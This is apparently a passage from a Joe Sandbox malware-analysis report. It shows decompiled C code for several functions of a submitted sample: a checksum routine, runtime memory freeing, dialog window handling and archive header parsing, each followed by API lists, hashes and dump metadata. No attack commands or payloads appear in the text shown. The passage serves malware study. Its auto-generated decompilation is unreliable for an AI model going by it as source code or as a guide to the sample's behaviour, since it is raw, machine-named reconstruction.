						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xa3eeb0 + (_t68 >> 0x18) * 4) ^  *(0xa3f2b0 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa3f6b0 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa3feb0 + (_t51 >> 0x18) * 4) ^  *(0xa402b0 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa406b0 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa3fab0 + (_t68 & 0x000000ff) * 4) ^  *(0xa40ab0 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xa3eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}









                                                        0x00a05ebf
                                                        0x00a05ec3
                                                        0x00a05ec7
                                                        0x00a05ecc
                                                        0x00a05ece
                                                        0x00a05ede
                                                        0x00a05ee5
                                                        0x00a05ee6
                                                        0x00a05ee9
                                                        0x00a05eec
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a05eec
                                                        0x00a05ece
                                                        0x00a05eee
                                                        0x00a05ef1
                                                        0x00a05efa
                                                        0x00a05efd
                                                        0x00a05efd
                                                        0x00a05eff
                                                        0x00a05f02
                                                        0x00a05f5f
                                                        0x00a05f62
                                                        0x00a05f76
                                                        0x00a05f78
                                                        0x00a05f78
                                                        0x00a05f7d
                                                        0x00a05f80
                                                        0x00a05f82
                                                        0x00a05f8d
                                                        0x00a05f94
                                                        0x00a05f95
                                                        0x00a05f95
                                                        0x00a05f82
                                                        0x00a05f9f

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
                                                        • Instruction ID: fecd5b5e63e188f973d0108ba7ca8661df0343a3a08d5bd1faf8e7597675239c
                                                        • Opcode Fuzzy Hash: 6bf20ceec5c8d80c975fb9f66e54a77dbf31447cbf102b29e3d8fa6ec0fc8892
                                                        • Instruction Fuzzy Hash: E2210731E245654FCB48CF7EECD08377765A786312746812BFA828B2D0C535ED26CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2C592 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A2C592(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xa3ed50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00A287FE(_t46);
							E00A2C171( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00A287FE(_t47);
							E00A2C26F( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00A287FE( *((intOrPtr*)(_t74 + 0x7c)));
						E00A287FE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00A287FE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00A287FE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00A287FE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00A287FE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00A2C705( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xa3e818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00A287FE(_t31);
							E00A287FE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00A287FE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00A287FE(_t74);
			}















                                                        0x00a2c59a
                                                        0x00a2c59e
                                                        0x00a2c5a6
                                                        0x00a2c5af
                                                        0x00a2c5b4
                                                        0x00a2c5bb
                                                        0x00a2c5c3
                                                        0x00a2c5cb
                                                        0x00a2c5d6
                                                        0x00a2c5dc
                                                        0x00a2c5dd
                                                        0x00a2c5e5
                                                        0x00a2c5ed
                                                        0x00a2c5f8
                                                        0x00a2c5fe
                                                        0x00a2c602
                                                        0x00a2c60d
                                                        0x00a2c613
                                                        0x00a2c5b4
                                                        0x00a2c614
                                                        0x00a2c61c
                                                        0x00a2c62f
                                                        0x00a2c642
                                                        0x00a2c650
                                                        0x00a2c65b
                                                        0x00a2c660
                                                        0x00a2c669
                                                        0x00a2c671
                                                        0x00a2c672
                                                        0x00a2c678
                                                        0x00a2c67b
                                                        0x00a2c67e
                                                        0x00a2c685
                                                        0x00a2c687
                                                        0x00a2c68b
                                                        0x00a2c693
                                                        0x00a2c69a
                                                        0x00a2c6a0
                                                        0x00a2c6a1
                                                        0x00a2c6a1
                                                        0x00a2c6a8
                                                        0x00a2c6aa
                                                        0x00a2c6af
                                                        0x00a2c6b7
                                                        0x00a2c6bc
                                                        0x00a2c6bd
                                                        0x00a2c6bd
                                                        0x00a2c6c0
                                                        0x00a2c6c3
                                                        0x00a2c6c6
                                                        0x00a2c6c9
                                                        0x00a2c6c9
                                                        0x00a2c6db

                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 00A2C5D6
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C18E
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1A0
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1B2
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1C4
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1D6
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1E8
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C1FA
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C20C
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C21E
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C230
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C242
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C254
                                                          • Part of subcall function 00A2C171: _free.LIBCMT ref: 00A2C266
                                                        • _free.LIBCMT ref: 00A2C5CB
                                                          • Part of subcall function 00A287FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?), ref: 00A28814
                                                          • Part of subcall function 00A287FE: GetLastError.KERNEL32(?,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?,?), ref: 00A28826
                                                        • _free.LIBCMT ref: 00A2C5ED
                                                        • _free.LIBCMT ref: 00A2C602
                                                        • _free.LIBCMT ref: 00A2C60D
                                                        • _free.LIBCMT ref: 00A2C62F
                                                        • _free.LIBCMT ref: 00A2C642
                                                        • _free.LIBCMT ref: 00A2C650
                                                        • _free.LIBCMT ref: 00A2C65B
                                                        • _free.LIBCMT ref: 00A2C693
                                                        • _free.LIBCMT ref: 00A2C69A
                                                        • _free.LIBCMT ref: 00A2C6B7
                                                        • _free.LIBCMT ref: 00A2C6CF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: c2056cd0e0a44eb72b738b18a811ab4a742b4b51fcfa0e62ed961879eeea2b06
                                                        • Instruction ID: 6d8c73e489412c4b1353f3794f4a788e6d2489dfd21504f509f1d14f5092997a
                                                        • Opcode Fuzzy Hash: c2056cd0e0a44eb72b738b18a811ab4a742b4b51fcfa0e62ed961879eeea2b06
                                                        • Instruction Fuzzy Hash: 8E314C72601225AFEB20AB3DEA85B5A73E9BF10760F246439F458DB191DF75EC408B24
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1CFEE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1CFEE(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E00A1E630();
				_t8 = E00A19F7A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E00A11AC4( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00A19FBA(_v4);
							SendMessageW(_t32, 0x172, 0, E00A1A1BD(_t27, _t48, _t25, E00A19F99(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}














                                                        0x00a1cfee
                                                        0x00a1cfee
                                                        0x00a1cff3
                                                        0x00a1cff8
                                                        0x00a1cfff
                                                        0x00a1d0d6
                                                        0x00a1d0dc
                                                        0x00a1d0dc
                                                        0x00a1d011
                                                        0x00a1d017
                                                        0x00a1d019
                                                        0x00a1d01b
                                                        0x00a1d01f
                                                        0x00a1d0d3
                                                        0x00000000
                                                        0x00a1d0d5
                                                        0x00a1d026
                                                        0x00a1d03d
                                                        0x00a1d054
                                                        0x00a1d076
                                                        0x00a1d07a
                                                        0x00a1d084
                                                        0x00a1d08e
                                                        0x00a1d0ad
                                                        0x00a1d0b4
                                                        0x00a1d0b4
                                                        0x00a1d07a
                                                        0x00a1d0bd
                                                        0x00a1d0c3
                                                        0x00a1d0c7
                                                        0x00a1d0c9
                                                        0x00a1d0cc
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1d0cc
                                                        0x00000000
                                                        0x00a1d0c7
                                                        0x00000000

                                                        APIs
                                                        • GetWindow.USER32(?,00000005), ref: 00A1D011
                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00A1D03D
                                                          • Part of subcall function 00A11AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00A0B250,?,?,?,00A0B1FE,?,-00000002,?,00000000,?), ref: 00A11ADA
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00A1D059
                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A1D070
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1D084
                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A1D0AD
                                                        • DeleteObject.GDI32(00000000), ref: 00A1D0B4
                                                        • GetWindow.USER32(00000000,00000002), ref: 00A1D0BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                        • String ID: STATIC
                                                        • API String ID: 3820355801-1882779555
                                                        • Opcode ID: 860246ca773dd1eea9f5589dcef6905e7a35eb235a8b3475afb4129b0e276b11
                                                        • Instruction ID: 1f398b6678187ab48a6fabbf650307b68bf4e57c59f52d8be247c77663e73950
                                                        • Opcode Fuzzy Hash: 860246ca773dd1eea9f5589dcef6905e7a35eb235a8b3475afb4129b0e276b11
                                                        • Instruction Fuzzy Hash: 78115632149B107BE230ABB0DD09FEF36ADAF59711F010121FA42E10D1CBA08D8787A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A291C1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A291C1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xa35ed0) {
					E00A287FE(_t52);
					_t26 = _a4;
				}
				E00A287FE( *((intOrPtr*)(_t26 + 0x3c)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x30)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x34)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x38)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x28)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x2c)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x40)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x44)));
				E00A287FE( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00A2907B(5,  &_v8);
				_v8 =  &_a4;
				return E00A290CB(4,  &_v8);
			}




                                                        0x00a291c7
                                                        0x00a291ca
                                                        0x00a291d2
                                                        0x00a291d5
                                                        0x00a291da
                                                        0x00a291dd
                                                        0x00a291e1
                                                        0x00a291ec
                                                        0x00a291f7
                                                        0x00a29202
                                                        0x00a2920d
                                                        0x00a29218
                                                        0x00a29223
                                                        0x00a2922e
                                                        0x00a2923c
                                                        0x00a29244
                                                        0x00a2924d
                                                        0x00a29255
                                                        0x00a29269

                                                        APIs
                                                        • _free.LIBCMT ref: 00A291D5
                                                          • Part of subcall function 00A287FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?), ref: 00A28814
                                                          • Part of subcall function 00A287FE: GetLastError.KERNEL32(?,?,00A2C306,?,00000000,?,00000000,?,00A2C32D,?,00000007,?,?,00A2C72A,?,?), ref: 00A28826
                                                        • _free.LIBCMT ref: 00A291E1
                                                        • _free.LIBCMT ref: 00A291EC
                                                        • _free.LIBCMT ref: 00A291F7
                                                        • _free.LIBCMT ref: 00A29202
                                                        • _free.LIBCMT ref: 00A2920D
                                                        • _free.LIBCMT ref: 00A29218
                                                        • _free.LIBCMT ref: 00A29223
                                                        • _free.LIBCMT ref: 00A2922E
                                                        • _free.LIBCMT ref: 00A2923C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 06e84d858608384429ccadeebfe62f3b054d8086ee69b06dd20f6f3077329b53
                                                        • Instruction ID: 67174bec47038cb514f289e5d262bb3da5c42be1e1b38b2b401f313164606364
                                                        • Opcode Fuzzy Hash: 06e84d858608384429ccadeebfe62f3b054d8086ee69b06dd20f6f3077329b53
                                                        • Instruction Fuzzy Hash: C911A47A501158AFCB11EF5DEA42CD93BA5FF14350F6140A5BA088F236DA35DE509B84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A020E7 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00A020E7(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E00A1E630();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00A0C8E4(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00A0C8E4(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00A0C8E4(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00A0C8E4(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00A0C8E4(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00A0C8E4(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00A0C8E4(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00A0C797(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00A03F8F(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00A03F3A(_t257, _t240 + 0x28, _t167);
												}
												E00A0C846(_t318, _t240 + 0x10a1, 0x10);
												E00A0C846(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00A0C846(_t318, _t240 + 0x10c2, 8);
													E00A0C846(_t318, _t344 + 0x30, 4);
													E00A0FBA2(_t344 + 0x58);
													E00A0FBE8(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00A0FAB1(_t344 + 0x5c);
													_t161 = E00A2009A(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00A2009A(_t325, 0xa33668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00A03F8F(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00A03F3A(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00A0C8E4(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00A0C846(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00A0C8E4(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00A110CC(_t240 + 0x1040, _t315, E00A0C826(_t278, __eflags), _t315);
													} else {
														E00A1108D(_t240 + 0x1040, _t315, E00A0C7E4(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00A110CC(_t240 + 0x1048, _t315, E00A0C826(_t275, __eflags), _t315);
													} else {
														E00A1108D(_t240 + 0x1048, _t315, E00A0C7E4(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00A110CC(_t240 + 0x1050, _t315, E00A0C826(_t272, __eflags), _t315);
													} else {
														E00A1108D(_t240 + 0x1050, _t315, E00A0C7E4(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00A0C7E4(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00A10D4A(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00A0C7E4(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00A10D4A(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00A0C7E4(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00A10D4A(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
